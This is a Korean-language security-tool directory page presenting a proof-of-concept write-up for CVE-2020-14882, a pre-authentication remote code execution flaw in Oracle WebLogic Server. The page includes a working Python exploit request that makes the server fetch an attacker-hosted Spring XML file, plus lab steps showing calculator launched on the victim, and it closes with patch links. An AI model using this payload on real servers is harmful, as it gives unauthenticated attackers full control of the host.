Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-14882 — Oracle WebLogic Server 탈취 | Kitploit
도구/GitHubGitHub/lucaspdiniz/cve-2020-14882
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHublucaspdiniz/cve-2020-14882

CVE-2020-14882

Oracle WebLogic Server 탈취

저장소 보기
112년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

WebLogic RCE 취약점 - CVE-2020-14882

  • 소개

CVE-2020-14882는 Oracle WebLogic Server의 Console 구성 요소에 있는 원격 코드 실행(RCE) 취약점입니다. 이 인증 전 취약점은 공격 복잡도가 '낮음'으로 평가되었으며 Oracle에 의해 '쉽게 악용 가능'한 것으로 강조되어 CVSSv3 점수 9.8의 심각도 등급을 받았습니다. 성공적으로 악용될 경우, 인증되지 않은 공격자가 HTTP를 통해 Oracle WebLogic 서버를 손상시키고 호스트에 대한 완전한 제어권을 얻을 수 있습니다. (자세히 보기 - Tenable)

  • 심각도 점수 - CVSS 3 ⚠️


영향을 받는 지원 버전은 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 및 14.1.1.0.0입니다.

탐색 - POC ❗

환경 💻

피해자 (WebLogic Server): 192.168.0.15 - Windows 10 PRO에서 WebLogic Server 실행 중.
공격자 (호스팅된 XML 파일): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.

  1. 첫 번째 단계로, WebLogic의 취약점을 악용하는 Python 파일을 만들어 보겠습니다.

페이로드:

root@kitploit:~
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
		'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
		'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)

이 페이로드는 spring framework XML 라이브러리를 호출하여 공격자 도메인의 서버에 요청을 보내 teste.xml 파일을 찾습니다.

  1. 피해자가 호출할 XML 파일을 준비해야 합니다. 표준 XML 구조를 만들었지만, 프레임워크와 값 필드를 포함했습니다. 이 단계에서는 값 필드가 피해자 측에서 실행되기 때문에 중요합니다. 이 예에서는 Windows 계산기 파일을 호출합니다.

  1. 공격자 호스트에서는 피해자가 요청할 XML 파일을 제공하는 서버를 만들어야 합니다. 편의를 위해 자체 Python 서버인 http.server를 사용합니다.

  1. 공격 시작 🎯. 1단계의 스크립트를 실행합니다. 이 단계에서는 피해자가 수행한 XML 파일 호출 로그를 확인할 수 있었습니다.

  1. RCE 성공적으로 실행됨 💥. 피해자 측에서는 Windows 계산기의 원격 실행(RCE)을 확인할 수 있습니다.

결론

10월 28일, Jang이라는 보안 연구원이 CVE-2020-14882에 관한 블로그 게시물(베트남어)을 게시했으며, PoC에 사용할 수 있는 일부 세부 정보를 포함했습니다. Jang은 WebLogic 취약점에 대해 잘 알려진 인물로, CVE-2020-2555를 발견하여 Oracle에 보고한 공로를 인정받았으며, Oracle은 2020년 1월 CPU에서 해당 취약점을 패치했습니다. 3월에 Jang은 CVE-2020-2555가 완전히 수정되지 않았음을 확인했습니다. CVE-2020-2555의 우회 방법은 VNPT 정보보안 센터(ISC)의 Quynh Le라는 또 다른 연구원이 공개했습니다. Le와 Jang 모두 이 우회 방법을 보고한 공로를 인정받았으며, 이는 CVE-2020-2883으로 식별됩니다. (자세히 보기 - Tenable)

수정에 도움이 되는 링크

  • Oracle WebLogic: CVE-2020-14882 : Critical Patch Update (문서 ID 2771503.1). (Oracle 지원)

  • Oracle Critical Patch Update Advisory - 2020년 10월. (Oracle 지원)

  • CVE-2020-14882 Weblogic의 영향을 완화하는 방법. (Oracle 지원)

  • Oracle Fusion Middleware의 Oracle WebLogic Server 제품에 존재하는 취약점. (Mitre - CVE)

취약점 수정됨 ✅

도구 다운로드